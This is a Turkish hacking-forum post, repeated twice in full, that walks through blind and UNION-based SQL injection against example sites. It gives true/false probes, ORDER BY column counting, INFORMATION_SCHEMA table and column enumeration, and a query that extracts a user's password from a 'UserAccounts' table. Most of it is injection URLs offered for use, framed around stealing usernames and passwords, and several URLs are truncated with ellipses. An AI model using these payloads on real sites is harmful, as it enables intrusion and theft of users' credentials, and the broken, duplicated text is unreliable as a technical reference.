BlackShadow
Spys-Z
- Katılım
- 3 Eyl 2014
- Mesajlar
- 264
- Tepkime puanı
- 0
- Puanları
- 0
Anlatım Bana Aittir Kendinize İyi Bakın Sql Çeşitlerini Burda Bitirmiş Bulunmaktayım Kendinize İyi Bakın.. Neyse Başlayalım
Blind de Hata Sayfanın and+1=1 , and+1=0
Arkadaşlar Biraz Karışık Olabilir Elimden Geldiği Kadar Sizlere
Laf Kalabalığı Yapmadan Anlatacağım Direk Başlıyalım...
Örnek :
http://www.blackshadow.com/page.php?id=10+and+1=0
http://www.blackshadow.com/page.php?id=10+and+1=1
Bu Şekilde İse Ekran Görüntülenecektir.Çünkü 1,1 e Eşittir. Mantıken
Bundan Sonrasını Normal İnj Olarak Uygulayacağız. Makaleme Bakabilirsiniz.
http://www.blackshadow.com/page.php?.....database()--
Burada and+1=0 yapmış bulunmaktayız.1 0 ’a eşit olmadığı için (false) olumsuz cevap verecektir.
http://www.blackshadow.com/page.php?.....database()--
Burada and+1=1 yaptık.1 1 ’e eşit olduğu için (true) olumlu cevap verecektir ve Tablolar Yansıyacaktır.
.
Şimdi Geldik Komutlara
http://www.site.com/news.asp?ArticleID=10+AND+1=0- Komutun Çevirisi; Eğer sadece 1 rakamı 0 rakamının benzeri ise, 10 numaralı makaleyi göster. Bu durumda, “AND” komutu makalenin görüntülenmek için uygun olduğu anlamına gelir, makale 10 bulunmalı ve 1’de 0’a eşit olmalı. Bu da makalenin yüklenmemesine neden olur çünkü 1, 0’a benzer degildir.
http://www.site.com/news.asp?ArticleID=10+AND+1=1-
Komutun Çevirisi; Eğer sadece 1 rakamı 0 rakamının benzeri ise, 10 numaralı makaleyi göster. Makale görüntülenebilmeli, çünkü 10 numaralı makale mevcut ve 1’de 0’a eşit. İstediğinizde makale yüklendiğinden ve istemediğinizde de yüklenmediğinden dolayı komutlarımızın buradan komutların çalışıyor olduğunu anlayabiliriz. Bu da linkin açık olduğu ve devam edebileceğimiz anlamına gelir.
--- Sayfada Gösterilen Toplam Sütun Sayısını Bulmak ---
http://www.site.com/news.asp?ArticleID=10+ORDER+BY+1- “ORDER BY 1” Sırala Demektir Arkadaşalar Zaten Order Sırala Demektir Neyse Devam Edelim.
(1 Numaralı Stünun Bulundugu Mekan) sayfaya 1 numaralı sütunu ilk sayfa içerisinde göstermesini söyler. “ORDER BY 2” 2 numaralı sütunu ilk sayfada gösterir. Komutun Anlamı: “SELECT” Hocam Burda Sizlere Şöyle Diyim Sizin Belirtdiğin Tabloda ki bilgileri ister ben sana öyle anlatayım
Hedef Tabloda İsim Bulmak
http://www.site.com/news.asp?ArticleID=-...ayed_table’-
Not : Aradığımız Tablo Username ve Passwordların Bulunduğu Table’dır. Tablolara Ulaştıktan Sonra, Doğru Tabloyu Bulabilmek İçin “TABLES” kısmının sonuna "+WHERE+table_name>’displayed_table’ " Ekle Kardeşim. Komutun Anlamı: Listedeki ‘displayed_table’ den sonraki tablonun ismini görüntüle.
--- Column’ları ( Kolon ) Görüntülemek ---
http://www.blackshadow1.com/news.asp?ArticleID= 1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SC HEMA.COLUMNS+WHERE+table_name=&**8203;’UserAccount s’—
Komutun Anlamı: “UserAccounts” tablosundaki sütunların isimlerini görüntüle. Bu Komutumuz İle “UserAccounts” Table’ında Bulunan Columnları ( Kolon ) Göreceksiniz.
--- Hedef Columnları Bulalım ---
http://www.blackshadow1.com/news.asp.....yed_column’-
Eğer kullanıcı adı ve şifreleri arıyorsanız; username, password, user,pass, login_name gibi isimlerle adlandırılmış sütunları bulmayı denemelisiniz. Komutun Anlamı: Listedeki ’displayed_column.’ Dan sonraki diğer sütunun ismini görüntüle.
--- Database’deki User’ın Bilgilerini Çekelim ---
Table Name: “UserAccounts” Column Name: “username” ve “password” http://www.blackshadow1.com/news.asp.....erAccounts--
Komutun Anlamı: “UserAccounts” tablosundaki “username” sütununda bulunan kayıtları görüntüle. Username’imiz "black" Olsun.
http://www.blackshadow1.com/news.asp...L...unts+WHERE +username=’black’--
]
Burda ki Komutun Amacı : UserAccounts(Kullanıcı Üyeliğindeki) Tablosunda’ki “black” Nickli Kullanıcının Şifresini Göster
Password : System black Nicli User’ın Password’unun Sistem Oldugunu Düşünelim
Arkadaşlar Eksiğim Kusurum Var ise Hakkınızı Helal Edin Umarım Doğru Bir Makale Olmuştur
Blind de Hata Sayfanın and+1=1 , and+1=0
Arkadaşlar Biraz Karışık Olabilir Elimden Geldiği Kadar Sizlere
Laf Kalabalığı Yapmadan Anlatacağım Direk Başlıyalım...
Örnek :
http://www.blackshadow.com/page.php?id=10+and+1=0
http://www.blackshadow.com/page.php?id=10+and+1=1
Bu Şekilde İse Ekran Görüntülenecektir.Çünkü 1,1 e Eşittir. Mantıken
Bundan Sonrasını Normal İnj Olarak Uygulayacağız. Makaleme Bakabilirsiniz.
http://www.blackshadow.com/page.php?.....database()--
Burada and+1=0 yapmış bulunmaktayız.1 0 ’a eşit olmadığı için (false) olumsuz cevap verecektir.
http://www.blackshadow.com/page.php?.....database()--
Burada and+1=1 yaptık.1 1 ’e eşit olduğu için (true) olumlu cevap verecektir ve Tablolar Yansıyacaktır.
.
Şimdi Geldik Komutlara
http://www.site.com/news.asp?ArticleID=10+AND+1=0- Komutun Çevirisi; Eğer sadece 1 rakamı 0 rakamının benzeri ise, 10 numaralı makaleyi göster. Bu durumda, “AND” komutu makalenin görüntülenmek için uygun olduğu anlamına gelir, makale 10 bulunmalı ve 1’de 0’a eşit olmalı. Bu da makalenin yüklenmemesine neden olur çünkü 1, 0’a benzer degildir.
http://www.site.com/news.asp?ArticleID=10+AND+1=1-
Komutun Çevirisi; Eğer sadece 1 rakamı 0 rakamının benzeri ise, 10 numaralı makaleyi göster. Makale görüntülenebilmeli, çünkü 10 numaralı makale mevcut ve 1’de 0’a eşit. İstediğinizde makale yüklendiğinden ve istemediğinizde de yüklenmediğinden dolayı komutlarımızın buradan komutların çalışıyor olduğunu anlayabiliriz. Bu da linkin açık olduğu ve devam edebileceğimiz anlamına gelir.
--- Sayfada Gösterilen Toplam Sütun Sayısını Bulmak ---
http://www.site.com/news.asp?ArticleID=10+ORDER+BY+1- “ORDER BY 1” Sırala Demektir Arkadaşalar Zaten Order Sırala Demektir Neyse Devam Edelim.
(1 Numaralı Stünun Bulundugu Mekan) sayfaya 1 numaralı sütunu ilk sayfa içerisinde göstermesini söyler. “ORDER BY 2” 2 numaralı sütunu ilk sayfada gösterir. Komutun Anlamı: “SELECT” Hocam Burda Sizlere Şöyle Diyim Sizin Belirtdiğin Tabloda ki bilgileri ister ben sana öyle anlatayım
Hedef Tabloda İsim Bulmak
http://www.site.com/news.asp?ArticleID=-...ayed_table’-
Not : Aradığımız Tablo Username ve Passwordların Bulunduğu Table’dır. Tablolara Ulaştıktan Sonra, Doğru Tabloyu Bulabilmek İçin “TABLES” kısmının sonuna "+WHERE+table_name>’displayed_table’ " Ekle Kardeşim. Komutun Anlamı: Listedeki ‘displayed_table’ den sonraki tablonun ismini görüntüle.
--- Column’ları ( Kolon ) Görüntülemek ---
http://www.blackshadow1.com/news.asp?ArticleID= 1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SC HEMA.COLUMNS+WHERE+table_name=&**8203;’UserAccount s’—
Komutun Anlamı: “UserAccounts” tablosundaki sütunların isimlerini görüntüle. Bu Komutumuz İle “UserAccounts” Table’ında Bulunan Columnları ( Kolon ) Göreceksiniz.
--- Hedef Columnları Bulalım ---
http://www.blackshadow1.com/news.asp.....yed_column’-
Eğer kullanıcı adı ve şifreleri arıyorsanız; username, password, user,pass, login_name gibi isimlerle adlandırılmış sütunları bulmayı denemelisiniz. Komutun Anlamı: Listedeki ’displayed_column.’ Dan sonraki diğer sütunun ismini görüntüle.
--- Database’deki User’ın Bilgilerini Çekelim ---
Table Name: “UserAccounts” Column Name: “username” ve “password” http://www.blackshadow1.com/news.asp.....erAccounts--
Komutun Anlamı: “UserAccounts” tablosundaki “username” sütununda bulunan kayıtları görüntüle. Username’imiz "black" Olsun.
http://www.blackshadow1.com/news.asp...L...unts+WHERE +username=’black’--
]
Burda ki Komutun Amacı : UserAccounts(Kullanıcı Üyeliğindeki) Tablosunda’ki “black” Nickli Kullanıcının Şifresini Göster
Password : System black Nicli User’ın Password’unun Sistem Oldugunu Düşünelim
Arkadaşlar Eksiğim Kusurum Var ise Hakkınızı Helal Edin Umarım Doğru Bir Makale Olmuştur